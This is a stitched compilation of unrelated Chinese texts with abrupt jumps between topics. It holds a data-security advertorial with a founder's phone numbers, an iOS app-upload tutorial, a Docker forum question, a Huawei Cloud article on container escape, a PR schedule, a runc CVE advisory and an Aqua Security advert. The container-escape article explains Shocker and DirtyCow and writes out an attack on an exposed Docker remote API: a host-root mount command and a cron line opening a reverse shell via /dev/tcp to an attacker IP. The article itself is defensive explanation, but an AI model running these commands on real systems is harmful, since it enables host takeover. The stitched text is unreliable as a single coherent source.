当企业管理者在搜索引擎中急切地寻找 “可靠的数据安全公司” 时，背后往往是这些具体而尖锐的焦虑：担心核心图纸和财务数据被内部人员随意拷贝外泄，恐惧商业机密在供应链协作中失控，焦虑无法满足日益严格的合规审计要求，以及面对海量安全产品时无从下手的迷茫。这些痛点归结起来，是企业需要寻找一个可信、有效、全面且能共担风险的合作伙伴。本文将解析构建企业数据安全防线的四大核心维度，并以业内代表性实践为例，为您的决策提供一份具象化的参考图谱与直接对话的窗口。第一重防线：可信根基 —— 以 “军工级” 资质与可触达的团队破解信任难题企业的首要痛点在于 “信任谁” 以及 “谁能负责”。在复杂的市场中选择一家安全公司，本质上是将企业命脉进行托付，一个可直接沟通、背景过硬的核心团队至关重要。解决之道：将国家级权威认证和可信背景作为筛选的刚性门槛。重点考察服务商是否持有公安部、国家保密局、国家商用密码管理局的官方认证，这是合规能力的基石。更进一步，若服务商具备军工安全背景及其负责人鲜明的军人特质，则意味着其安全标准、管理流程和责任感经历过最高标准的淬炼，能带来非同寻常的严谨与可靠。其核心优势更体现在四大价值支柱：一是权威合规，方案源自西安信安保密技术研究所顶层框架，杜绝合规反复；二是深度定制，西安交大提供专属研发支撑，解决个性化业务需求；三是认证保障，等保测评机构前置预审，确保 “一次设计，一次通过”；四是生态整合，集成深信服、奇安信等顶尖厂商能力，实现全栈闭环交付。此外，公司作为西安信安保密技术研究所战略合作伙伴，已构建起涵盖西安交大软件学院、等保测评机构、深信服、四叶草、奇安信的多元生态体系，通过 “研究所合规框架 + 高校定制研发 + 顶尖厂商技术集成” 的生态整合模式，进一步夯实了可信服务的基础。实战范例与直接通道：以上海秦盾密界信息科技有限公司为例，其创始人总经理卢鹏辉先生为退役特种兵，这一独特基因将 “为国守密” 的使命与纪律性深度融入企业。公司集齐了前述三大国家局及解放军相关认证。对于希望与决策层直接沟通、深入了解其安全理念的企业，可以直接联系卢鹏辉先生（联系电话：15596819945/18508957045），或发送邮件至 lupenghui@qindunmijie.top 进行初步接洽。这种由创始人直接背书的可触达性，本身即是建立深度信任的开始。第二重防线：实战技术 —— 用 “内核加密” 与 “智能预警” 确保真实有效企业最怕 “钱花了，却防不住”。技术必须能精准打击内部有意无意的泄密、外部窃取等核心场景，并且有真实战果验证。解决之道：有效的技术必须构成组合拳：一是对数据本体的内核级加密，确保文件 “离企即失效”；二是对泄露行为的智能感知与阻断，防患于未然。数据本体加密：采用国密 SM4 等合规算法，对核心文件进行强制透明加密。授权用户在内部环境可正常使用，一旦非法外带，文件即成为乱码。智能行为管控：利用 AI 学习正常操作模式，精准识别并预警 “深夜批量下载”、“访问敏感数据库” 等异常行为。同时，必须能防控拍照、截屏等旁路攻击，例如通过动态屏幕水印进行震慑与溯源。针对企业核心数据安全的三大核心刚需，该技术体系形成了精准解决方案：一是研发数据防泄密，通过透明加密 + 行为审计，确保设计图纸、源代码等核心文件 “拿不走”；二是供应链安全交换，依托安全网关与国密算法，实现与外协单位的数据流转 “看不懂”；三是等保 / 分级保护合规提速，通过三方联动机制保障合规测评 “一次通过”。实战范例：该公司的核心技术体系正是这一思路的体现。其以国密 SM4 算法构建了透明的加密底座。同时，其 “三维智能防护闭环” 集成了 AI 异常行为识别和动态水印技术。据公开案例，该方案曾帮助某航空企业成功拦截了 32 起潜在泄密事件，其屏幕水印功能更直接阻断了数百次通过拍照方式外传图纸的企图，验证了技术的实战效果。第三重防线：闭环管理 —— 打造覆盖全生命周期与各类场景的管控体系数据安全不是单点工具，而是一个管理系统。企业痛点在于如何将安全无缝融入日常业务流程，实现自动化、精细化管理，并确保在各地分支机构都能有效落地。解决之道：优秀的数据安全方案应提供覆盖 “事前预防、事中控制、事后审计” 的完整闭环管理能力。这包括对设备接入、移动存储、网络出口的严格管控；对数据流转、使用的实时监控；以及对所有操作行为的全链路日志追溯，为事件定责与合规审计提供铁证。此外，服务商能否提供本地化的支持团队，直接影响系统部署效率和应急响应速度。得益于生态伙伴的协同支持，其闭环管理体系实现了 “顶层合规设计 — 定制研发落地 — 测评认证通过” 的全栈交付，杜绝方案孤岛，确保安全体系与业务流程深度融合，无需企业额外协调多方资源。实战范例：其解决方案提供了完整的管理闭环，例如实现 U 盘分级加密、离职账号自动禁用与文件密文自毁。尤为重要的是，为保障服务响应的及时性，公司在陕西省西安市雁塔区雁塔路 99 号保赛大厦 3F（西安信安保密技术研究所园区内）设立了西北运营中心。这支本地化专业团队能够为西北及周边区域的企业提供快速的现场支持、部署实施和应急响应，解决了远程服务 “鞭长莫及” 的痛点。第四重防线：零风险验证 —— 以 “极致承诺” 与 “透明验证” 消除决策顾虑面对最终选型，企业的最后一重顾虑是 “如果效果不好怎么办？” 他们需要可验证的路径、可靠的保障和透明的信息来降低决策风险。解决之道：决策前，应优先选择能提供 “深度体验” 和 “责任共担” 承诺的服务商。这包括足够时长的全功能真实环境试用，以及清晰、有力的服务保障与赔偿条款。同时，通过官网等公开渠道全面了解公司信息，是建立初步信任的关键一步。值得一提的是，其方案已为超 200 家军工与高端制造企业守护核心数据，除拦截 32 起高危泄密事件外，更帮助客户挽回潜在经济损失超 8000 万元。针对企业决策顾虑，除 30 天免费试用与 “敢买敢赔” 承诺外，公司还推出专属权益：企业可通过扫码或致电垂询，免费获取《核心数据安全风险自查清单》及快速诊断服务，提前排查安全隐患。同时，西安运营中心的本地化服务进一步升级，在 7×24 小时远程监测基础上，承诺 2 小时内现场应急响应，确保突发情况快速处置。实战范例：该公司提出的 “敢买敢赔” 承诺，正是这一理念的突出代表。其不仅提供为期 30 天的 DLP 系统全功能免费试用，允许企业在真实环境中验证，更承诺若因使用其产品导致数据损失，经核定后愿承担高额赔偿。企业可以通过访问 官网获取该承诺的详细条款、技术白皮书及更多客户见证。结合其西北运营中心提供的本地化极速服务（7×24 小时支持 + 快速现场响应），共同构成了一个从验证、决策到长期保障的完整信任链条。总结与行动指南选择数据安全合作伙伴，是一个从理念认同到实践验证的系统过程。企业可遵循以下路径：技术内核与案例审视深入考察其加密技术、管理闭环是否直击三大核心刚需（研发数据防泄密、供应链安全交换、合规提速），并索要同行业真实案例及 “挽回超 8000 万元潜在损失” 等实战成果验证实效。服务体系与本地支持评估确认其服务网络是否能覆盖您所在区域，重点关注本地化服务能力：如西北及周边区域可核实西安运营中心的 7×24 小时远程监测 + 2 小时现场应急响应承诺，确保应急需求快速响应。深度验证与权责约定务必要求进行真实环境的充分测试，主动申领《核心数据安全风险自查清单》及免费快速诊断服务，提前排查隐患；同时高度重视那些敢于提供 “敢买敢赔” 等实质性保障的服务商条款，明确权责边界。最终，构建数据安全防线，不仅是采购一套系统，更是选择一位兼具坚定安全意志、硬核实战技术、闭环管理智慧、责任共担勇气以及本地化服务支撑的战略伙伴。这条从建立信任、验证能力到获得保障的完整路径，正是企业守护核心数字资产，走向稳健未来的坚实步伐。  

完成实验,坐等抽奖活动

随着Apple Store越来越成熟，以及越来越多的开发者和公司希望在该平台上投放自己的产品，iOS APP上架成为许多开发者和公司普遍关注的话题。但是，由于苹果App Store的审核政策日益严格，大多数开发者和公司都不太清楚iOS APP上架的具体流程。今天，我们将为您介绍iOS APP上架的具体流程，希望可以帮助您顺利的完成iOS APP的上架。1、准备App Store账号和必要的资料；2、登录App Store Connect并注册开发者账号；3、填写应用信息，包括：应用名称、描述、标签、版本等；4、上传产品报告文件；5、上传应用截图和APP文件；6、提交审核；7、审核通过后，即可在App Store上架。证书我们这边可以借助辅助工具appuploaderAppuploader可以辅助在Windows、linux或mac系统直接申请iOS证书p12，及上传ipa到App Store，最方便在Windows开发上架没有苹果Mac电脑的开发者！配合本教程使用，可以快速掌握如何真机测试及上架！点击苹果证书按钮点击新增 输入证书密码，名称这个密码不是账号密码，而是一个保护证书的密码，是p12文件的密码，此密码设置后没有其他地方可以找到，忘记了只能删除证书重新制作，所以请务必记住密码。还有为了安全起见，密码不要太简单。 证书名称是你为了在证书列表里面便于区别的一个字符，自己好辨识就可以，尽量是是字母和数字之类选择证书类型带distribution的是发布类型，带development的是开发类型。apple类型=ios+mac，所以开发时选择ios app development和apple development 类型都是可以的选择bundle id只有部分类型的证书需要选择bundle id，例如推送证书。因为大部分证书是不和app关联的。而是通过描述文件profile文件关联app。使用appuploader同步服务如果期望制作好证书后在其他电脑上同样可以下载到这个证书，或者和你同事同步此证书，则需要勾选使用appuploader服务同步。否则您需要手动管理p12文件在不同电脑之间的传输，并且一但创建下载后，无法在其他电脑下载，只能手动复制文件过去。一般情况下，推荐使用appuploader服务同步。证书类型说明IOS开发选择apple development或者ios app development 类型 ios 发布选择 apple distribution或者 ios distribution （app store and ad hoc） 开发推送证书选择 apple push notification service ssl (sandbox) 发布推送证书选择 apple push notification service ssl (sandbox & production)其他证书不是很常用，可以自行百度各种证书说明

各位老师，请问 我现在在服务器的docker环境里，起了容器（centos或者ubuntu） 让用户进行作为client机器访问集群，如何禁止用户在此容器里 的下载或者上传操作呢？我能想到的是 容器里 禁止安装rzsz等工具，请问有没有通过 端口号直接禁止相关操作的行为，或者其他方式？

背景：通过smartkit对AtlasEdge设备进行设备授权时出现执行命令失败排查方法：当授权模式是site, 当前针对MindX 3.0.RC3及之前的版本只支持容器部署、模型文件下载配置，如果下方了网管配置会导致执行命令失败当授权模式是CORE时，除了MindX 3.0.RC2支持Core 模板表格中的所有项外，其他版本（例如MindX 2.0.4.6 MindX 3.0.RC3）只支持imageSha256WhiteList、containerCpuLim、containerCpuLimit配置，如果配置下发了其他项会导致命令失败

>摘要：云原生2.0时代，任何企业都可以成为“新云原生企业”，作为云原生的代表技术之一的容器，每个企业都应该对容器安全有所了解。本文分享自华为云社区《[云原生2.0时代：企业更应了解一下容器安全](https://huaweicloud.blog.csdn.net/article/details/114066177)》，原文作者：华为助力企业上云。 随着云原生技术的成熟和市场需求的升级，云计算的发展已步入新的阶段，云原生2.0时代已经到来。从技术角度看，以容器、微服务以及动态编排为代表的云原生技术蓬勃发展，成为赋能业务创新的重要推动力，并已经应用到企业核心业务。从市场角度看，云原生技术已在金融、制造、互联网等多个行业得到广泛验证，支持的业务场景也愈加丰富，行业生态日渐繁荣。云原生2.0是企业智能升级的新阶段，企业云化从“ON Cloud”走向“IN Cloud”，新生能力与既有能力有机协同、立而不破，实现资源高效、应用敏捷、业务智能、安全可信，成为“新云原生企业”。 云原生2.0时代，任何企业都可以成为“新云原生企业”，作为云原生的代表技术之一的容器，每个企业都应该对容器安全有所了解。 传统的虚拟机能够基于虚拟化技术更加有效的利用硬件计算资源，可以实现云租户的隔离与资源共享。相比虚拟机来说，容器更轻、更快，但是作为一种新技术，容器的安全防护也与虚拟机所有不同。 # 容器 VS 虚拟机 容器与虚拟机具有相似的资源隔离和分配价值，但容器的作用不同，因为容器是虚拟化操作系统而不是硬件。容器更便携，更高效。  容器VS虚拟机 虚拟机（VM）是对物理硬件的抽象，将一台服务器转化为多台服务器。Hypervisor允许在一台机器上运行多个虚拟机。每个虚拟机都包含操作系统、应用程序、必要的二进制文件和库的完整副本，占用数十GB的空间。虚拟机启动速度也比较慢。 容器是应用程序层的一个抽象，将代码和依赖打包在一起。多个容器可以运行在同一台机器上，与其他容器共享操作系统内核，每个容器在用户空间中作为隔离的进程运行。容器比虚拟机占用更少的空间（容器镜像通常只有几十MB大小），可以处理更多的应用程序。 # 容器逃逸  容器逃逸，是容器技术启用以来一直被关注的问题，甚至被认为是容器的首要安全问题。所谓“逃逸”，指的是“流氓”容器/虚拟机尝试突破隔离环境的限制，访问宿主系统或者在同一个系统上的同驻容器或虚拟机。从而造成敏感信息泄露，或者系统及服务发生DOS的行为。  但正是由于容器与宿主系统共享内核，因此容器与宿主机有着更大的接触面，隔离层次更少，更容易从容器内实施逃逸攻击。因此，如何解决容器逃逸安全风险，避免容器逃逸攻击带来的损失是容器安全中最为重要的一个问题。 # 容器逃逸常用手段 ## （1）通过容器自身漏洞及内核漏洞逃逸  攻击的主要途径之一就是利用漏洞，通过程序设计或实现的缺陷来执行非法操作，容器逃逸也不例外。容器自身漏洞是其利用进行逃逸的路径之一，同时由于容器共享宿主系统内核，因此内核漏洞是其逃逸的另一路径，同时由于内核漏洞的数量远远大于容器自身漏洞，因此内核漏洞甚至成为容器逃逸更为主要的一个手段。 **1）利用容器漏洞逃逸 – shocker攻击** Shocker攻击是容器逃逸最著名的案例，其本质是利用了一个不常用的系统调用open_by_handle_at，同时借助docker1.0前版本并未限制CAP_DAC_READ_SEARCH能力，并将容器启动时会挂载宿主机文件到容器内（如旧版本的/.dockerinit，新版本的/etc/hosts）作为起点，执行暴力破解攻击，最终获取到要访问的宿主系统文件的句柄信息并进行读取，从而实现逃逸。 Github地址：https://github.com/gabrtv/shocker 容器执行shocker攻击逃逸访问宿主系统/etc/shadow文件：  2）内核漏洞利用逃逸 – dirtycow攻击  DirtyCow（脏牛漏洞，CVE-2016-5195）是Linux内核中的一个权限提升漏洞，其也可被容器利用实施逃逸。容器利用dirtycow漏洞改写虚拟动态共享库VDSO（Virtual Dynamically Shared Objec），并将shellcode置入其中，当主机系统进程调用并执行修改后的内容时，就会借用此进程身份执行置入的shellcode，并最终在容器内获得一个来自主机的root权限的shell。  ## （2）不安全配置引发逃逸 **1）不安全启动，如privileged特权容器** 容器以--privileged参数启动时称为特权容器，特权容器顾名思义具有较高权限，包括对宿主机上的设备的访问权限。因此，攻击者可以直接在容器内mount主机设备并进行文件访问，从而轻而易举实现逃逸。   **2）不安全挂载，如挂载docker.sock到容器**  图片来源：https://medium.com/better-programming/about-var-run-docker-sock-3bfd276e12fd Docker.sock文件是一个Unix domain socket文件，是Docker daemon默认监听的套接字文件，docker client通过它与docker daemon进行通信。docker client将信息查询和下发命令等请求通过docker.sock发给docker daemon，然后由deamon执行具体请求，包括镜像查询、容器创建等。 将docker.sock挂载到容器内，可以在容器内继续运行一个容器，实现docker in docker，并可在容器内容器启动时通过-v参数将宿主机根目录挂载到容器内，从而在容器内访问宿主机文件，实现逃逸。  **3）Docker remote api未授权访问** 默认情况下，docker daemon只允许通过unix domain socket – docker.sock进行本地通信操作，但除此之外，docker daemon也提供了Restful API供远端client访问（daemon通过-H参数指定监听端口），如果未对访问进行权限控制及合规性检查，则攻击者也可以访问这个API执行高危操作，并实施逃逸攻击。 例如一种攻击场景： - 通过Remote API创建一个容器，并将宿主系统根目录挂载到容器内： `# docker -H tcp://$IP:$PORT run -it -v /:/mnt ubuntu /bin/bash` 其中：$IP表示docker daemon服务ip，$PORT表示Remote API监听端口 - 将反弹shell命令写入计划任务文件 `# echo '* * * * * /bin/bash -i >& /dev/tcp/$IP/$PORT 0>&1' >> /mnt/var/spool/cron/crontabs/root` 其中：$IP表示攻击端IP，$PROT表示攻击端监听端口 - 攻击端监听上一步中的$PORT端口，获取来自对端（docker服务所在系统）的具有root权限得反弹shell，并任意访问。 # 华为云容器安全服务CGS之逃逸安全防护方案  # 华为云容器安全服务CGS 华为云容器安全服务CGS构建了容器安全威胁纵深防御体系，提供包括镜像扫描、威胁检测与威胁防护的一整套容器安全能力，提供针对容器的Build、Ship、Run全生命周期保护能力，渗透到整个容器DevOps流程，保证容器虚拟环境从开发到生产整个流程的安全。其中，容器逃逸检测是CGS的核心功能之一，它通过如下手段构建系统化的容器逃逸全面防护能力： ## （1）监控容器不安全配置启动 前文中提到，不安全配置是容器逃逸的一个重要原因。因此，监控容器的不安全启动也是容器逃逸防护的一个重要手段。CGS可以针对容器启动的各种不安全配置进行监控，包括启动特权容器、挂载宿主机文件、安全策略关闭、特权端口映射等，从容器创建伊始就检测逃逸风险，实现整体防护方案第一步。 ## （2）容器行为深度分析 容器启动后，CGS可对容器运行过程中的行为进行实时跟踪和观察，监控容器内的进程运行、文件访问、网络连接、系统调用等行为，并对行为进行深度分析，从行为过程体现出来的特征到行为所产生的结果进行全面分析检测，有效发现容器已知和未知漏洞利用逃逸攻击行为并进行告警。  ## （3）容器基线机器学习 一般而言，容器的行为通常固定且纯粹，比如一个提供web服务的容器内可能只会运行一个nginx进程，一个提供DB服务的容器内可能只会运行一个mysql进程，并且进程所执行的操作，包括文件访问、系统调用、网络连接等行为都有固定合理范围，因此可以对容器圈定正常行为范围，构建行为基线。CGS利用机器学习技术，从静态和动态两个维度分析容器正常行为并建立基线，使得基线模型更准确、更完整，然后根据基线跟踪容器行为，感知基线以外的异常行为，实现对攻击行为的全面感知，并有效提升对于容器利用0day漏洞进行逃逸攻击的检测能力。  华为云CGS容器逃逸方案防护机制内置在防护平台，无需用户参与即可实现容器逃逸系统化检测，具有良好的易用性，同时方案采用事件驱动机制实现性能高、反应快，为容器安全保驾护航。

发布时间分类主题发布渠道　1月 新闻稿厚积薄发，华为云构筑原生冰山安全体系，守护云上安全微信Link活动软文摆脱潜在安全威胁，华为云威胁检测服务MTD公测上线！微信Link2月 新闻稿2020华为云安全年度盘点微信Link产品软文这就是你亟需的那份防盗指南？微信Link产品软文云原生2.0时代，企业都应该了解的容器安全IT168LinkCSDNLink至顶网Link知乎Link搜狐号Link企鹅号Link华为云社区Link3月 新闻稿华为云数据安全中心服务正式商用微信Link今日头条Link网易新闻LinkIT168Link天极网Link产品软文云上风险听诊器——华为云威胁检测服务今日头条Link腾讯客户端Link凤凰网Link搜狐网Link极客公园Link51ctoLinkCSDNLinkDOITLinkDOSTORLink天极网Link华为云社区Link活动软文大揭秘！华为云“安全镖局”的秘密法宝竟然是……微信Link今日头条Link4月产品软文打造黄金镜像，智能反逃逸，揭秘华为云CGS的容器防护 “魔法”今日头条Link凤凰网LinkIT168Link产品软文华为云原生安全能力释放，守护蘑菇街更安全凤凰网LinkIT168Link搜狐网Link5月产品软文华为云厚积薄发，大展“云上安全”宏图！——2021企业上云安全指南【华为云社区】Link【今日头条】Link百家号Link极客网Link砍柴网Link东方财富网Link中国经营网Link搜狐网LinkZAKERLink产品软文新一代云原生防火墙即将闪亮登场，智简安全一键开启微信Link【今日头条】Link搜狐网Link凤凰网LinkCTI论坛LinkZOL云计算Link上云无忧Link 新闻稿华为云发布安全生态“沧海行动”计划，共建云原生安全新生态微信LinkIT 168Link新闻稿一键开启云上安全，华为云CFW云防火墙正式发布！微信Link【今日头条】Link6月微信Link产品软文让应用更安全，华为云应用信任中心ATC正式公测IT168 Link飞象网Link今日头条Link产品软文为企业云化全面“体检”，华为云升级云服务基线检测功能今日头条Link网易Link百家号Link中国经营网Link凤凰网LinkCSDNLink7月热点追踪数据安全法来了，做好数据安全保护看这里！微信Link活动软文三大看点干货，华为云为企业应用防护再出大招？微信Link活动软文保障云上安全，我们是专业的！微信Link新闻稿 大招齐放，安全感爆棚微信Link新闻稿华为云发布四大安全新品，牢筑企业应用安全防线【今日头条】Link产品软文 智护业务安全，华为云安全运营新品组合出击微信Link新闻稿华为云通过德国C5:2020标准审计【今日头条】Link新闻稿华为云联合信通院发布《云服务安全治理白皮书》微信Link【今日头条】Link8月产品软文守卫个人信息安全，这件利器值得拥有//个人信息保护法关联宣传微信Link产品软文威胁检测服务赐您“火眼金睛” ，让潜在威胁无处遁行【云图说】Link9月产品软文数据安全保护，八招致胜微信Link【今日头条】Link搜狐网Link10月产品软文华为云WAF，智能CC防护舍我其谁微博Link【今日头条】Link知乎Link新闻稿一个来自“天府之国”的邀约【今日头条】Link微信Link搜狐Link华为云社区Link新闻稿2021国际网络安全高峰论坛-华为云云原生安全论坛，四大看点抢先知！/加码云原生安全，华为云又放大招？百家号Link腾讯客户端Link四川新闻网Link华西都市网Link凤凰网Link中关村在线Link极客网Link新闻稿华为云发布《企业上云安全白皮书》，助力客户上云安全极客公园Link天极网LinkIT168Link砍柴网Link【今日头条】Link搜狐Link新闻稿华为云发布零信任能力成熟度模型白皮书，推动行业零信任能力建设中关村在线Link极客网Link天极网LinkIT168Link【今日头条】Link搜狐Link新闻稿华为云发布混合云解决方案安全白皮书，构建安全可信的云上环境IT之家Link至顶网LinkITbearLinkC114通信网Link【今日头条】Link搜狐Link新闻稿华为云首次提出“安全零摩擦”理念，打造智能极简云原生安全/华为云提供安全服务组合的四化能力，智护企业实现业务安全零摩擦腾讯客户端Link搜狐客户端Link凤凰网Link极客公园Link至顶网LinkIT168Link中国应急安全网Link移动安全网Link【今日头条】Link搜狐Link新闻稿华为云发布安全治理云图Compass，提升企业合规上云效率/华为云发布安全治理云图——安全治理即服务，合规上云腾讯客户端Link百家号Link财经网Link极客公园LinkIT168Link凤凰网Link中国应急安全网Link【今日头条】Link新闻稿华为云数据安全中心全新升级，守护数据的全生命周期安全腾讯客户端Link百家号Link中关村在线Link极客网Link至顶网Link金融界Link凤凰网Link中国应急安全网Link【今日头条】Link11月产品软文以零信任构建安全防护，让安全和访问自由兼得 【今日头条】Link知乎Link搜狐Link

一、概要近日，华为云关注到业界有安全研究人员披露runc 符号链接挂载与容器逃逸漏洞（CVE-2021-30465），攻击者可通过创建恶意POD及container，利用符号链接以及条件竞争漏洞，可挂载宿主机目录至 container 中，最终可能会导致容器逃逸。目前漏洞细节、POC已公开，风险高。华为云提醒使用runc的用户及时安排自检并做好安全加固。参考链接：mount destinations can be swapped via symlink-exchange to cause mounts outside the rootfs二、威胁级别威胁级别：【严重】（说明：威胁级别共四级：一般、重要、严重、紧急）三、漏洞影响范围影响版本：runc <= 1.0.0-rc94安全版本：runc 1.0.0-rc95 四、漏洞处置目前官方已在最新的版本中修复了该漏洞，请受影响的用户及时升级：https://github.com/opencontainers/runc/releases华为云容器安全服务CGS已具备该逃逸漏洞的预防与逃逸行为检测能力，使用华为云容器安全服务的用户可参考如下操作指导进行配置：https://support.huaweicloud.com/usermanual-cgs/cgs_01_0019.html注：修复漏洞前请将资料备份，并进行充分测试。

容器作为一种轻量级的虚拟技术，使应用程序认为他们自己有一个专门为他们服务的完整的操作系统，其帮助开发人员实现了更简单的封装、快速的程序部署、减少程序的环境依赖并支持横向的可扩展性。然而这种通用包装服务模式，其将每个容器视为“服务单位”，大大降低了程序的透明度和可审计性， 那么我们如何在不损失容器带来的优点情况下保证容器及其内运行程序的安全性？Aqua Security做为专门为容器技术设计的安全性产品，给予企业容器虚拟环境从开发到生产整个周期的安全性，减少IT安全部门与开发部门的协调沟通成本，并对容器内部的应用程序活动具有高可见性，允许组织检测和防范可疑活动和实时攻击。其同时还通过以下几点来提高企业内部容器虚拟环境的安全性：l 定期同步Registry内的images并进行安全扫描，可根据预先设置的规则，比如CVE总体威胁级别、CVE评分等，自动禁用威胁image。l 所有的威胁扫描条目都与云端同步，保证实效性。l 可自定义image镜像执行的白名单和黑名单，也允许用户自定义Base OS image （操作系统模板镜像）。l 可与Jenkins等常用CI/CD程序整合，在自动打包image时即进行威胁扫描。l 可查看Host主机上所有运行及停止状态容器的详细信息，包括威胁漏洞、环境变量、挂载卷、已安装包、容器配置等。l 对Host及容器内部都有详细的活动日志记录。l 可针对容器运行状态设置自定义的安全规则，如只读文件、运行容器的OS用户、执行命令、挂载盘、特权参数、环境变量参数等，保证容器运行时的合规性、安全性。l 可自主学习相关容器运行时的操作，根据学习到的结果自动生成安全规则赋予容器。l 可针对Host主机的操作系统用户定义不同角色，实现用户docker相关命令的颗粒化权限管理。l 可针对容器与容器、容器与Host、Host与其他节点之间设置网络防火墙策略，实现Docker容器虚拟环境的网络监管。l 可将内部数据导入到Splunk、ArcSight等其他日志收集程序进行分析、联动l 集中化管理容器运行时的敏感信息（Secret），并以环境变量的方式注入容器。注入后密码信息只能通过容器内部获取，无法通过外部Inspect等命令得到。同时Aqua Security也支持和CyberArk、Azure Key Vault、Amazon Key Management Store等的整合，将这些敏感信息储存在这些第三方程序内并调用。 http://www.aqua-sec.com.cn 如果有需要请直接联系我们, [email]ChinaSupport@edvancesecurity.com[/email], 电话：400-099-2608。